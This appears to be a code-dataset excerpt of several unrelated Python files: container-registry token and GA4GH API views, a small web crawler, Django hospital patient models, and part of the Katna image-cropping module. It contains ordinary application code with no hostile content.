if action == 'manifest' and user_can_pull(username, repository, request):
allowed_actions.append('pull')
access.append({
"type": repo_type,
"name": repository,
"actions": allowed_actions
})
claims = {'iss': request.registry.config['registry']['issuer'],
'sub': username,
'aud': service,
'access': access,
#'nbf': datetime.datetime.utcnow(),
'iat': datetime.datetime.utcnow(),
'exp': datetime.datetime.utcnow()+datetime.timedelta(seconds=3600*24),
}
token = jwt.encode(claims,
private_key, algorithm='RS256',
headers={'jwk': {'kty': 'RSA', 'alg': 'RS256',
'n': base64.urlsafe_b64encode(modulus),
'e': base64.urlsafe_b64encode(exponent),
'x5c': [base64.b64encode(der)]
}}
)
return {'token': token}
return HTTPForbidden()
@view_config(route_name='api_users', renderer='json')
def api_users(request):
user = json.loads(request.body, encoding=request.charset)
user_id = None
existing_user = request.registry.db_mongo['users'].find_one({'id': user_id})
if not existing_user:
return HTTPForbidden("You must register first")
return Response("User Created", status_code=201)
@view_config(route_name='ga4gh_tools_query', renderer='json', request_method='GET')
def ga4gh_tools_query(request):
return HTTPNotFound()
@view_config(route_name='ga4gh_tool_descriptor', renderer='json', request_method='GET')
def ga4gh_tool_descriptor(request):
if 'format' in request.params and request.params['format'].lower() != 'cwl':
return HTTPNotFound()
repo_id = request.matchdict['id']
elts = repo_id.split('@')
repo_id = elts[0]
repo = request.registry.db_mongo['repository'].find_one({'_id': ObjectId(repo_id), 'visible': True})
if 'cwl' not in repo['meta'] or not repo['meta']['cwl']:
return HTTPNotFound()
return { 'descriptor': repo['meta']['cwl'] }
@view_config(route_name='ga4gh_tool_dockerfile', renderer='json', request_method='GET')
def ga4gh_tool_dockerfile(request):
repo_id = request.matchdict['id']
elts = repo_id.split('@')
repo_id = elts[0]
repo = request.registry.db_mongo['repository'].find_one({'_id': ObjectId(repo_id), 'visible': True})
if 'Dockerfile' not in repo['meta'] or not repo['meta']['Dockerfile']:
return HTTPNotFound()
return { 'dockerfile': repo['meta']['Dockerfile'] }
'''
config.add_route('ga4gh_tools', '/api/ga4gh/v1/tools')
config.add_route('ga4gh_tools_id', '/api/ga4gh/v1/tools/{id}')
config.add_route('ga4gh_tools_id_versions', '/api/ga4gh/v1/tools/{id}/versions')
config.add_route('ga4gh_tools_id_version', '/api/ga4gh/v1/tools/{id}/versions/{versionid}')
config.add_route('ga4gh_tools_id_version_descriptor', '/api/ga4gh/v1/tools/{id}/versions/{versionid}/{type}/descriptor')
config.add_route('ga4gh_tools_id_version_descriptor_file_relative_path', '/api/ga4gh/v1/tools/{id}/versions/{versionid}/{type}/descriptor/{relativepath}')
config.add_route('ga4gh_tools_id_version_dockerfile', '/api/ga4gh/v1/tools/{id}/versions/{versionid}/dockerfile')
config.add_route('ga4gh_metadata', '/api/ga4gh/v1/metadata')
config.add_route('ga4gh_tool_classes', '/api/ga4gh/v1/tool-classes')
'''
@view_config(route_name='ga4gh_metadata', renderer='json', request_method='GET')
def ga4gh_metadata(request):
return {
'version': '1.0',
'api-version': '1.0',
'country': 'FRA',
'friendly-name': 'bioshadock'
}
@view_config(route_name='ga4gh_tools_id', renderer='json', request_method='GET')
def ga4gh_tools_id(request):
repo_id = request.matchdict['id']
elts = repo_id.split('@')
repo_id = elts[0]
repo = request.registry.db_mongo['repository'].find_one({'_id': ObjectId(repo_id), 'visible': True})
if not repo:
return HTTPNotFound()
repo_versions = request.registry.db_mongo['versions'].find({'repo': repo['id']})
if not repo_versions:
return HTTPNotFound()
toolname = repo['id'].split('/')[-1:][0]
tool = {
'url': 'https://'+request.registry.config['registry']['issuer']+ '/app/#/container/' + repo['id'],
'id': str(repo['_id'])+'@'+request.registry.config['registry']['service'],
'organization': request.registry.config['registry']['service'],
'toolname': toolname,
'tooltype': {},
'description': repo['meta']['description'],
'author': repo['user'],
'meta-version': 'latest',
'versions': []
}
# Versions
versions = []
# Versions
for repo_version in repo_versions:
version = {
'id': repo_version['version'],
'name': repo_version['version'],
'meta-version': 'latest',
'url': 'https://'+request.registry.config['registry']['issuer']+ '/app/#/container/' + repo['id'],
'image': request.registry.config['registry']['service'] + '/' + repo['id'] + ':' + repo_version['version'],
'descriptor-type': [],
'dockerfile': False
}
if repo_version['cwl']:
version['descriptor-type'] = ['CWL']
if repo_version['dockerfile']:
version['dockerfile'] = {'dockerfile': True}
versions.append(version)
tool['versions'] = versions
return tool
@view_config(route_name='ga4gh_tools_id_versions', renderer='json', request_method='GET')
def ga4gh_tools_id_versions(request):
repo_id = request.matchdict['id']
elts = repo_id.split('@')
repo_id = elts[0]
repo = request.registry.db_mongo['repository'].find_one({'_id': ObjectId(repo_id), 'visible': True})
if not repo:
return HTTPNotFound()
repo_versions = request.registry.db_mongo['versions'].find({'repo': repo['id']})
if not repo_versions:
return HTTPNotFound()
versions = []
# Versions
for repo_version in repo_versions:
version = {
'id': repo_version['version'],
'name': repo_version['version'],
'meta-version': 'latest',
'url': 'https://'+request.registry.config['registry']['issuer']+ '/app/#/container/' + repo['id'],
'image': request.registry.config['registry']['service'] + '/' + repo['id'] + ':' + repo_version['version'],
'descriptor-type': [],
'dockerfile': False
}
if repo_version['cwl']:
version['descriptor-type'] = ['CWL']
if repo_version['dockerfile']:
version['dockerfile'] = {'dockerfile': True}
versions.append(version)
return versions
@view_config(route_name='ga4gh_tools_id_version', renderer='json', request_method='GET')
def ga4gh_tools_id_version(request):
repo_id = request.matchdict['id']
elts = repo_id.split('@')
repo_id = elts[0]
repo_version_id = request.matchdict['versionid']
repo = request.registry.db_mongo['repository'].find_one({'_id': ObjectId(repo_id), 'visible': True})
if not repo:
return HTTPNotFound()
repo_version = request.registry.db_mongo['versions'].find_one({'repo': repo['id'], 'version': repo_version_id})
if not repo_version:
return HTTPNotFound()
version = {
'id': repo_version['version'],
'name': repo_version['version'],
'meta-version': 'latest',
'url': 'https://'+request.registry.config['registry']['issuer']+ '/app/#/container/' + repo['id'],
'image': request.registry.config['registry']['service'] + '/' + repo['id'] + ':' + repo_version['version'],
'descriptor-type': [],
'dockerfile': False
}
if repo_version['cwl']:
version['descriptor-type'] = ['CWL']
if repo_version['dockerfile']:
version['dockerfile'] = {'dockerfile': True}
return version
@view_config(route_name='ga4gh_tools_id_version_descriptor', renderer='json', request_method='GET')
def ga4gh_tools_id_version_descriptor(request):
if request.matchdict['type'] not in ['CWL', 'plain-CWL']:
return HTTPNotFound()
repo_id = request.matchdict['id']
repo_version = request.matchdict['versionid']
elts = repo_id.split('@')
repo_id = elts[0]
repo = request.registry.db_mongo['repository'].find_one({'_id': ObjectId(repo_id), 'visible': True})
if not repo:
return HTTPForbidden()
repo_version = request.registry.db_mongo['versions'].find_one({'repo': repo['id'], 'version': repo_version})
if not repo_version:
return HTTPNotFound()
if not repo_version['cwl']:
return HTTPNotFound()
return { 'type': 'CWL', 'descriptor': repo_version['cwl'] }
@view_config(route_name='ga4gh_tools_id_version_descriptor_file_relative_path', renderer='json', request_method='GET')
def ga4gh_tools_id_version_descriptor_file_relative_path(request):
return HTTPNotFound()
@view_config(route_name='ga4gh_tools_id_version_dockerfile', renderer='json', request_method='GET')
def ga4gh_tools_id_version_dockerfile(request):
repo_id = request.matchdict['id']
repo_version = request.matchdict['versionid']
elts = repo_id.split('@')
repo_id = elts[0]
repo = request.registry.db_mongo['repository'].find_one({'_id': ObjectId(repo_id), 'visible': True})
if not repo:
return HTTPNotFound()
repo_version = request.registry.db_mongo['versions'].find_one({'repo': repo['id'], 'version': repo_version})
if not repo_version:
return HTTPNotFound()
if not repo_version['dockerfile']:
return HTTPNotFound()
return { 'dockerfile': repo_version['dockerfile'] }
@view_config(route_name='ga4gh_tool_classes', renderer='json', request_method='GET')
def ga4gh_tool_classes(request):
return HTTPNotFound()
@view_config(route_name='ga4gh_tools', renderer='json', request_method='GET')
def ga4gh_tools(request):
repos = request.registry.db_mongo['repository'].find({'visible': True})
tools = []
offset= 0
if 'offset' in request.params:
offset = int(request.params['offset'])
limit = -1
if 'limit' in request.params:
limit = int(request.params['limit'])
index = 0
for repo in repos:
toolname = repo['id'].split('/')[-1:][0]
if 'cwl' not in repo['meta']:
repo['meta']['cwl'] = None
if 'id' in request.params:
if request.params['id'] != str(repo['_id'])+'@'+request.registry.config['registry']['service']:
continue
if 'registry' in request.params:
if request.params['registry'] != request.registry.config['registry']['service']:
return []
if 'organization' in request.params:
if request.params['organization'] != request.registry.config['registry']['service']:
return []
if 'name' in request.params:
if request.params['name'] != repo['id']:
continue
if 'toolname' in request.params:
if request.params['toolname'] != toolname and request.params['toolname'] not in repo['meta']['tags']:
continue
if 'description' in request.params:
if request.params['description'] not in repo['meta']['description']:
continue
if 'author' in request.params:
if request.params['author'] != repo['user']:
continue
tool = {
'url': 'https://'+request.registry.config['registry']['issuer']+ '/app/#/container/' + repo['id'],
'id': str(repo['_id'])+'@'+request.registry.config['registry']['service'],
'organization': request.registry.config['registry']['service'],
'toolname': toolname,
'tooltype': {},
'description': repo['meta']['description'],
'author': repo['user'],
'meta-version': 'latest',
'versions': []
}
# Versions
if 'docker_tags' in repo['meta']:
for docker_tag in repo['meta']['docker_tags']:
if 'tag' not in repo['meta']['docker_tags'][docker_tag]:
repo['meta']['docker_tags'][docker_tag]['tag'] = 'latest'
version = {
'id': repo['meta']['docker_tags'][docker_tag]['tag'],
'name': repo['meta']['docker_tags'][docker_tag]['tag'],
'meta-version': 'latest',
'url': 'https://'+request.registry.config['registry']['issuer']+ '/app/#/container/' + repo['id'],
'image': request.registry.config['registry']['service'] + '/' + repo['id'] + ':' + repo['meta']['docker_tags'][docker_tag]['tag'],
'descriptor-type': [],
'dockerfile': False
}
#repo_version = request.registry.db_mongo['versions'].find_one({'repo': repo['id'], 'version': repo['meta']['docker_tags'][docker_tag]['tag']})
if 'cwl_path' in repo['meta'] and repo['meta']['cwl_path']:
version['descriptor-type'] = ['CWL']
if repo['meta']['Dockerfile']:
version['dockerfile'] = {'dockerfile': True}
tool['versions'].append(version)
if limit == -1 or index < limit:
if index >= offset and tool['versions']:
tools.append(tool)
index += 1
if limit >= 0 and index >= limit:
break
return tools
@view_config(route_name='home', renderer='json')
def my_view(request):
if 'BIOSHADOCK_INSECURE' in os.environ:
return HTTPFound(request.static_path('shadock:webapp/'+request.registry.runenv+'/'))
if request.scheme == "http":
return HTTPFound("https://" + request.host + "/" + request.static_path('shadock:webapp/'+request.registry.runenv+'/'))
return HTTPFound(request.static_path('shadock:webapp/'+request.registry.runenv+'/'))
@view_config(
context='velruse.AuthenticationComplete',
)
def login_complete_view(request):
context = request.context
user_id = None
if context.profile['preferredUsername']:
user_id = context.profile['preferredUsername']
else:
user_id = context.profile['accounts'][0]['username']
result = {
'id': user_id,
'provider_type': context.provider_type,
'provider_name': context.provider_name,
'profile': context.profile,
'credentials': context.credentials,
}
secret = request.registry.config['registry']['secret_passphrase']
token = jwt.encode({'user': result,
'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=36000),
'aud': 'urn:bioshadock/auth'}, secret)
return HTTPFound(request.static_url('shadock:webapp/dist/')+"index.html#login?token="+token)
``` |
{
"source": "Jibinjohnkj/crawler",
"score": 3
} |
#### File: crawler/spider/utils.py
```python
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse, urljoin
class Crawler:
max_links = 25
def __init__(self, url, max_depth=1):
self.max_depth = max_depth
self.url = url
self.pages_to_visit = []
def get_links(self):
# If max_links reached return
duplicate, limit_reached = self.check_if_duplicate_and_add(self.url)
if limit_reached:
return self.pages_to_visit
self.links_spider(self.url, 1)
return self.pages_to_visit
def links_spider(self, url, current_depth):
"""
Recursively parse all links until max_depth is reached
"""
# Exit if max_depth reached
if current_depth >= self.max_depth:
return
response = requests.head(url)
# Ignore non html content
if response.headers.get('Content-Type').split(';')[0] =='text/html':
# Two loops for the same thing
# This is a conscious choice. As we want the spider to crawl only if max_links not reached and
# also avoid crawling duplicate links
links = []
for link in self.parse_links(url):
# Add to self.pages_to_visit, if max_links reached return
duplicate, limit_reached = self.check_if_duplicate_and_add(link)
if limit_reached:
return
if not duplicate:
links.append(link)
for link in links:
self.links_spider(link, current_depth + 1)
def parse_links(self, url):
"""
Given a url retrieve all links
"""
scheme, host = urlparse(self.url)[:2]
response = requests.get(url)
s = BeautifulSoup(response.text, "html.parser")
# Get all links
for link in s.findAll('a'):
href = link.get('href')
if href:
# If links starts with '//', add scheme
if href.startswith('//'):
href = scheme + ':' + href
# If links starts with '/', its in the same domain, so just add scheme and host
if href.startswith('/'):
yield scheme + '://' + host + href
else:
# Check if links are of the same domain
href_host = urlparse(href)[1]
if href_host == host:
yield href
def check_if_duplicate_and_add(self, url):
"""
Given a url, Check if duplicate, if not add to self.pages_to_visit. Also check if max_links reached
"""
duplicate = False
for item in self.pages_to_visit:
# Check if the url already exist in self.pages_to_visit after stripping unnecessary bits
if self.__class__.process_url(url) == self.__class__.process_url(item):
duplicate = True
if duplicate:
return True, False,
else:
# Safety precaution against timeout
if len(self.pages_to_visit) < self.max_links:
self.pages_to_visit.append(url)
return False, False,
else:
return False, True,
@staticmethod
def process_url(url):
"""
Given a url, strip scheme, 'www' and ending '/'
"""
# Remove scheme before comparison
if url.startswith('http://'):
url = url.lstrip("http://")
# Remove scheme before comparison
if url.startswith('https://'):
url = url.lstrip("https://")
# Remove 'www' before comparison
if url.startswith('www.'):
url = url.lstrip("www.")
# Remove ending '/' before comparison
if url.endswith('/'):
url = url.rstrip('/')
return url
def get_images(self):
"""
Get all images from self.url
"""
scheme, host = urlparse(self.url)[:2]
response = requests.get(self.url)
s = BeautifulSoup(response.text, "html.parser")
for link in s.findAll('img'):
src = link.get('src')
if src:
# If base64 encode images, skip
if src.startswith('data:'):
continue
# If src start with '//', add scheme
elif src.startswith('//'):
yield scheme + ':' + src
# If links starts with '/', add scheme and host
elif src.startswith('/'):
yield scheme + '://' + host + src
else:
yield src
``` |
{
"source": "jibinkmathew94/care",
"score": 2
} |
#### File: facility/models/patient_consultation.py
```python
from django.db import models
from multiselectfield import MultiSelectField
from care.facility.models import CATEGORY_CHOICES, PatientBaseModel
from care.facility.models.mixins.permissions.patient import PatientRelatedPermissionMixin
from care.facility.models.patient_base import ADMIT_CHOICES, CURRENT_HEALTH_CHOICES, SYMPTOM_CHOICES, SuggestionChoices
from care.users.models import User
class PatientConsultation(PatientBaseModel, PatientRelatedPermissionMixin):
SUGGESTION_CHOICES = [
(SuggestionChoices.HI, "HOME ISOLATION"),
(SuggestionChoices.A, "ADMISSION"),
(SuggestionChoices.R, "REFERRAL"),
]
patient = models.ForeignKey("PatientRegistration", on_delete=models.CASCADE, related_name="consultations")
facility = models.ForeignKey("Facility", on_delete=models.CASCADE, related_name="consultations")
symptoms = MultiSelectField(choices=SYMPTOM_CHOICES, default=1, null=True, blank=True)
other_symptoms = models.TextField(default="", blank=True)
symptoms_onset_date = models.DateTimeField(null=True, blank=True)
category = models.CharField(choices=CATEGORY_CHOICES, max_length=8, default=None, blank=True, null=True)
examination_details = models.TextField(null=True, blank=True)
existing_medication = models.TextField(null=True, blank=True)
prescribed_medication = models.TextField(null=True, blank=True)
suggestion = models.CharField(max_length=3, choices=SUGGESTION_CHOICES)
referred_to = models.ForeignKey(
"Facility", null=True, blank=True, on_delete=models.PROTECT, related_name="referred_patients",
)
admitted = models.BooleanField(default=False)
admitted_to = models.IntegerField(choices=ADMIT_CHOICES, default=None, null=True, blank=True)
admission_date = models.DateTimeField(null=True, blank=True)
discharge_date = models.DateTimeField(null=True, blank=True)
bed_number = models.CharField(max_length=100, null=True, blank=True)
def __str__(self):
return f"{self.patient.name}<>{self.facility.name}"
def save(self, *args, **kwargs):
if not self.pk or self.referred_to is not None:
# pk is None when the consultation is created
# referred to is not null when the person is being referred to a new facility
self.patient.facility = self.referred_to or self.facility
self.patient.save()
super(PatientConsultation, self).save(*args, **kwargs)
class Meta:
constraints = [
models.CheckConstraint(
name="if_referral_suggested",
check=~models.Q(suggestion=SuggestionChoices.R) | models.Q(referred_to__isnull=False),
),
models.CheckConstraint(
name="if_admitted", check=models.Q(admitted=False) | models.Q(admission_date__isnull=False),
),
]
class DailyRound(PatientBaseModel):
consultation = models.ForeignKey(PatientConsultation, on_delete=models.PROTECT, related_name="daily_rounds")
temperature = models.DecimalField(max_digits=5, decimal_places=2, blank=True, default=0)
temperature_measured_at = models.DateTimeField(null=True, blank=True)
physical_examination_info = models.TextField(null=True, blank=True)
additional_symptoms = MultiSelectField(choices=SYMPTOM_CHOICES, default=1, null=True, blank=True)
other_symptoms = models.TextField(default="", blank=True)
patient_category = models.CharField(choices=CATEGORY_CHOICES, max_length=8, default=None, blank=True, null=True)
current_health = models.IntegerField(default=0, choices=CURRENT_HEALTH_CHOICES, blank=True)
recommend_discharge = models.BooleanField(default=False, verbose_name="Recommend Discharging Patient")
other_details = models.TextField(null=True, blank=True)
@staticmethod
def has_write_permission(request):
return request.user.is_superuser or (
request.user.user_type >= User.TYPE_VALUE_MAP["Staff"]
and (
request.user
in PatientConsultation.objects.get(
external_id=request.parser_context["kwargs"]["consultation_external_id"]
).facility.users.all()
)
)
@staticmethod
def has_read_permission(request):
return request.user.is_superuser or (
request.user.user_type >= User.TYPE_VALUE_MAP["Staff"]
and (
request.user
in PatientConsultation.objects.get(
external_id=request.parser_context["kwargs"]["consultation_external_id"]
).facility.users.all()
)
)
def has_object_read_permission(self, request):
return (
request.user.is_superuser
or request.user in (self.consultation.facility.created_by, self.consultation.patient.created_by,)
or request.user in self.consultation.patient.facility.users.all()
)
def has_object_write_permission(self, request):
return (
request.user.is_superuser
or request.user in (self.consultation.facility.created_by, self.consultation.patient.created_by,)
or request.user in self.consultation.facility.users.all()
)
```
#### File: facility/models/patient_sample.py
```python
from django.db import models
from care.facility.models import FacilityBaseModel, PatientRegistration
from care.users.models import User
SAMPLE_TYPE_CHOICES = [
(0, "UNKNOWN"),
(1, "BA/ETA"),
(2, "TS/NPS/NS"),
(3, "Blood in EDTA"),
(4, "Acute Sera"),
(5, "Covalescent sera"),
(6, "OTHER TYPE"),
]
class PatientSample(FacilityBaseModel):
SAMPLE_TEST_RESULT_MAP = {"POSITIVE": 1, "NEGATIVE": 2, "AWAITING": 3, "INVALID": 4}
SAMPLE_TEST_RESULT_CHOICES = [(v, k) for k, v in SAMPLE_TEST_RESULT_MAP.items()]
PATIENT_ICMR_CATEGORY = [
(0, "Cat 0"),
(10, "Cat 1"),
(20, "Cat 2"),
(30, "Cat 3"),
(40, "Cat 4"),
(50, "Cat 5a"),
(60, "Cat 5b"),
]
SAMPLE_TEST_FLOW_MAP = {
"REQUEST_SUBMITTED": 1,
"APPROVED": 2,
"DENIED": 3,
"SENT_TO_COLLECTON_CENTRE": 4,
"RECEIVED_AND_FORWARED": 5,
"RECEIVED_AT_LAB": 6,
"COMPLETED": 7,
}
SAMPLE_TEST_FLOW_CHOICES = [(v, k) for k, v in SAMPLE_TEST_FLOW_MAP.items()]
SAMPLE_FLOW_RULES = {
# previous rule # next valid rules
"REQUEST_SUBMITTED": {"APPROVED", "DENIED",},
"APPROVED": {"SENT_TO_COLLECTON_CENTRE", "RECEIVED_AND_FORWARED", "RECEIVED_AT_LAB", "COMPLETED"},
"DENIED": {"REQUEST_SUBMITTED"},
"SENT_TO_COLLECTON_CENTRE": {"RECEIVED_AND_FORWARED", "RECEIVED_AT_LAB", "COMPLETED"},
"RECEIVED_AND_FORWARED": {"RECEIVED_AT_LAB", "COMPLETED"},
"RECEIVED_AT_LAB": {"COMPLETED"},
}
patient = models.ForeignKey(PatientRegistration, on_delete=models.PROTECT)
consultation = models.ForeignKey("PatientConsultation", on_delete=models.PROTECT)
sample_type = models.IntegerField(choices=SAMPLE_TYPE_CHOICES, default=0)
sample_type_other = models.TextField(default="")
has_sari = models.BooleanField(default=False)
has_ari = models.BooleanField(default=False)
doctor_name = models.CharField(max_length=255, default="NO DOCTOR SPECIFIED")
diagnosis = models.TextField(default="")
diff_diagnosis = models.TextField(default="")
etiology_identified = models.TextField(default="")
is_atypical_presentation = models.BooleanField(default=False)
atypical_presentation = models.TextField(default="")
is_unusual_course = models.BooleanField(default=False)
icmr_category = models.IntegerField(choices=PATIENT_ICMR_CATEGORY, default=0)
icmr_label = models.CharField(max_length=200, default="")
status = models.IntegerField(choices=SAMPLE_TEST_FLOW_CHOICES, default=SAMPLE_TEST_FLOW_MAP["REQUEST_SUBMITTED"])
result = models.IntegerField(choices=SAMPLE_TEST_RESULT_CHOICES, default=SAMPLE_TEST_RESULT_MAP["AWAITING"])
fast_track = models.TextField(default="")
date_of_sample = models.DateTimeField(null=True, blank=True)
date_of_result = models.DateTimeField(null=True, blank=True)
@property
def flow(self):
try:
return self.flow_prefetched
except AttributeError:
return self.patientsampleflow_set.order_by("-created_date")
@staticmethod
def has_write_permission(request):
return request.user.is_superuser or request.user.user_type >= User.TYPE_VALUE_MAP["Staff"]
@staticmethod
def has_read_permission(request):
return request.user.is_superuser or request.user.user_type >= User.TYPE_VALUE_MAP["Staff"]
def has_object_read_permission(self, request):
return (
request.user.is_superuser
or request.user == self.consultation.facility.created_by
or (
request.user.district == self.consultation.facility.district
and request.user.user_type >= User.TYPE_VALUE_MAP["DistrictLabAdmin"]
)
or (
request.user.state == self.consultation.facility.state
and request.user.user_type >= User.TYPE_VALUE_MAP["StateLabAdmin"]
)
or request.user in self.consultation.patient.facility.users.all()
)
def has_object_update_permission(self, request):
if not self.has_object_read_permission(request):
return False
if request.user.is_superuser:
return True
map_ = self.SAMPLE_TEST_FLOW_CHOICES
if map_[self.status - 1][1] in ("REQUEST_SUBMITTED", "SENT_TO_COLLECTON_CENTRE"):
return request.user.user_type >= User.TYPE_VALUE_MAP["DistrictLabAdmin"]
elif map_[self.status - 1][1] in ("APPROVED", "DENIED"):
return request.user.user_type >= User.TYPE_VALUE_MAP["Staff"]
elif map_[self.status - 1][1] in ("RECEIVED_AND_FORWARED", "RECEIVED_AT_LAB"):
return request.user.user_type >= User.TYPE_VALUE_MAP["StateLabAdmin"]
# The view shall raise a 400
return True
def has_object_destroy_permission(self, request):
return request.user.is_superuser
class PatientSampleFlow(FacilityBaseModel):
patient_sample = models.ForeignKey(PatientSample, on_delete=models.PROTECT)
status = models.IntegerField(choices=PatientSample.SAMPLE_TEST_FLOW_CHOICES)
notes = models.CharField(max_length=255)
created_by = models.ForeignKey(User, on_delete=models.PROTECT)
```
#### File: facility/summarisation/facility_capacity.py
```python
from datetime import timedelta
from celery.decorators import periodic_task
from django.utils.decorators import method_decorator
from django.views.decorators.cache import cache_page
from rest_framework import status, viewsets
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from care.facility.api.serializers.facility import FacilitySerializer
from care.facility.api.serializers.facility_capacity import FacilityCapacitySerializer
from care.facility.models import FacilityCapacity
from care.users.models import User
class FacilityCapacitySummary(viewsets.ViewSet):
permission_classes = (IsAuthenticated,)
@method_decorator(cache_page(60 * 60 * 6))
def list(self, request, format=None):
if request.user.user_type < User.TYPE_VALUE_MAP["DistrictLabAdmin"]:
return Response({}, status=status.HTTP_403_FORBIDDEN)
possible_filter_params = ["state", "local_body", "district"]
filter_params = {}
for filter_query in possible_filter_params:
if request.GET.get(filter_query, False):
filter_params["facility__" + filter_query] = int(request.GET[filter_query])
capacity_objects = FacilityCapacity.objects.filter(**filter_params).select_related(
"facility", "facility__state", "facility__district", "facility__local_body"
)
capacity_summary = {}
for capacity_object in capacity_objects:
facility_id = capacity_object.facility.id
if facility_id not in capacity_summary:
capacity_summary[facility_id] = FacilitySerializer(capacity_object.facility).data
capacity_summary[facility_id]["availability"] = []
capacity_summary[facility_id]["availability"].append(FacilityCapacitySerializer(capacity_object).data)
return Response(capacity_summary)
@periodic_task(run_every=timedelta(seconds=1500))
def facilitySummary():
print("Testing Summarisation Again")
``` |
{
"source": "jibinmathew691993/PythonHackerrank",
"score": 4
} |
#### File: jibinmathew691993/PythonHackerrank/Swap Case.py
```python
def swap_case(s):
return "".join([char.lower() if char.isupper() else char.upper() for char in s])
if __name__ == '__main__':
print(swap_case(input()))
``` |
{
"source": "jibinmathew69/katna",
"score": 3
} |
#### File: katna/Katna/image.py
```python
import os
import cv2
import numpy as np
from Katna.decorators import FileDecorators
from Katna.feature_list import FeatureList
from Katna.filter_list import FilterList
from Katna.crop_extractor import CropExtractor
from Katna.crop_selector import CropSelector
import Katna.config as config
from Katna.decorators import DebugDecorators
class UserFiltersEnum:
"""Enum class for filters"""
text = "TextDetector"
class Image(object):
"""Class for all image cropping operations
:param object: base class inheritance
:type object: class:`Object`
"""
def __init__(self, disable_text=True):
"""Constructor for image files"""
featureList = FeatureList()
filterList = FilterList()
self.user_filters_enum = UserFiltersEnum()
self.crop_extractor = CropExtractor()
self.crop_selector = CropSelector()
self.features = featureList.get_features()
self.definedFilters = filterList.get_filters()
def _get_crop_specs(
self, image_height, image_width, ratio_height, ratio_width, is_height_small=True
):
"""Internal function to create the crop specs for a given aspect ratio
:param image_height: height of image
:type image_height: int, required
:param image_width: width of image
:type image_width: int, required
:param ratio_height: aspect ratio height (eg. 3 from 4:3)
:type ratio_height: int, required
:param ratio_width: aspect ratio width (eg. 4 from 4:3)
:type ratio_width: int, required
:param is_height_small: parameter to check if crop dimension should be reduced wrt height[default=True]
:type is_height_small: boolean, required
:return: list of crop height and crop width
:rtype:list of tuples
"""
# multiplication factor by which height/width of crop should be decreased to get crop specs
multiply_by = 1
crop_list_tuple = []
# Calculating the height and width ratio wrt aspect ratio
hr, wr = image_height / ratio_height, image_width / ratio_width
# print("hr, wr",hr, wr)
# Check if height is smaller than the width.If yes, interchange height and width.
if not is_height_small:
image_height, image_width = image_width, image_height
hr, wr = wr, hr
crop_height, crop_width = image_height, hr * ratio_width
# Decreasing the height and width for crops while checking it don't get small by 1/(min) of image height/width
while True:
if not (
(crop_height >= (image_height // config.Image.min_image_to_crop_factor))
and (
crop_width >= (image_width // config.Image.min_image_to_crop_factor)
)
):
break
crop_height, crop_width = (
int(crop_height),
int((ratio_width / ratio_height) * crop_height),
)
crop_list_tuple.append((crop_height, crop_width))
crop_height /= multiply_by
crop_height, crop_width = (
int(crop_height),
int((ratio_width / ratio_height) * crop_height),
)
multiply_by += config.Image.crop_height_reduction_factor_in_each_iteration
return crop_list_tuple
# Apply optional Debug mode decorator , If config=DEBUG is true this decorator
# will populate internal variables of Image module.debug_images with debug images
# Which you can see by opencv Imshow to check if every feature is working as expected
@DebugDecorators.add_optional_debug_images_for_image_module
def crop_image_from_cvimage(
self,
input_image,
crop_width,
crop_height,
num_of_crops,
filters=[],
down_sample_factor=config.Image.down_sample_factor,
):
"""smartly crops the imaged based on the specification - width and height
:param input_image: Input image
:type input_image: numpy array, required
:param crop_width: output crop width
:type crop_width: int
:param crop_height: output crop heigh
:type crop_height: int
:param num_of_crops: number of crops required
:type num_of_crops: int
:param filters: filters to be applied for cropping(only returns crops containing english text where the crop rectangle doesn't cut the text)
:type filters: list (eg. ['text'])
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:return: crop list
:rtype: list of structure crop_rect
"""
self.crop_extractor.down_sample_factor = down_sample_factor
if (
input_image.shape[0] + 5 <= crop_height
or input_image.shape[1] + 5 <= crop_width
):
# print(
# "Error: crop width or crop height larger than Image",
# "input_image.shape",
# input_image.shape,
# "crop_width",
# crop_width,
# "crop_height",
# crop_height,
# )
return []
extracted_candidate_crops = self.crop_extractor.extract_candidate_crops(
input_image, crop_width, crop_height, self.features
)
# print(extracted_candidate_crops)
# text: TextDetector
# dummy: DummyDetector
self.filters = []
for x in filters:
try:
self.filters.append(eval("self.user_filters_enum." + x))
except AttributeError as e:
print(str(e))
# self.filters = [eval("user_filters_enum."+x) for x in filters]
crops_list = self.crop_selector.select_candidate_crops(
input_image,
num_of_crops,
extracted_candidate_crops,
self.definedFilters,
self.filters,
)
return crops_list
def _extract_crop_for_files_iterator(
self,
list_of_files,
crop_width,
crop_height,
num_of_crops,
filters,
down_sample_factor,
):
"""Generator which yields crop data / error for filepaths in a list
:param list_of_files: list of files to process for crop
:type list_of_files: list, required
:param crop_width: output crop width
:type crop_width: int
:param crop_height: output crop height
:type crop_height: int
:param num_of_crops: number of crops required
:type num_of_crops: int
:param filters: filters to be applied for cropping(checks if image contains english text and the crop rectangle doesn't cut the text)
:type filters: list (eg. ['text'])
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:yield: dict containing error (if any), data ,and filepath of image processed
:rtype: dict
"""
for filepath in list_of_files:
print("Running for : ", filepath)
try:
crop_list = self._crop_image(
filepath,
crop_width,
crop_height,
num_of_crops,
filters,
down_sample_factor,
)
yield {"crops": crop_list, "error": None,"filepath": filepath}
except Exception as e:
yield {"crops": crop_list, "error": e,"filepath": filepath}
@FileDecorators.validate_dir_path
def crop_image_from_dir(
self,
dir_path,
crop_width,
crop_height,
num_of_crops,
writer,
filters=[],
down_sample_factor=config.Image.down_sample_factor,
):
"""smartly crops all the images (inside a directory) based on the specification - width and height
:param dir_path: Input Directory path
:type dir_path: str, required
:param crop_width: output crop width
:type crop_width: int
:param crop_height: output crop height
:type crop_height: int
:param num_of_crops: number of crops required
:type num_of_crops: int
:param writer: number of crops required
:type writer: int
:param filters: filters to be applied for cropping(checks if image contains english text and the crop rectangle doesn't cut the text)
:type filters: list (eg. ['text'])
:param down_sample_factor: number by which you want to reduce image height & width (use it if image is large or to fasten the process)
:type down_sample_factor: int [default=8]
:return: crop dict with key as filepath and crop list for the file
:rtype: dict
"""
valid_files = []
all_crops = {}
for path, subdirs, files in os.walk(dir_path):
for filename in files:
filepath = os.path.join(path, filename)
if self._check_if_valid_image(filepath):
valid_files.append(filepath)
if len(valid_files) > 0:
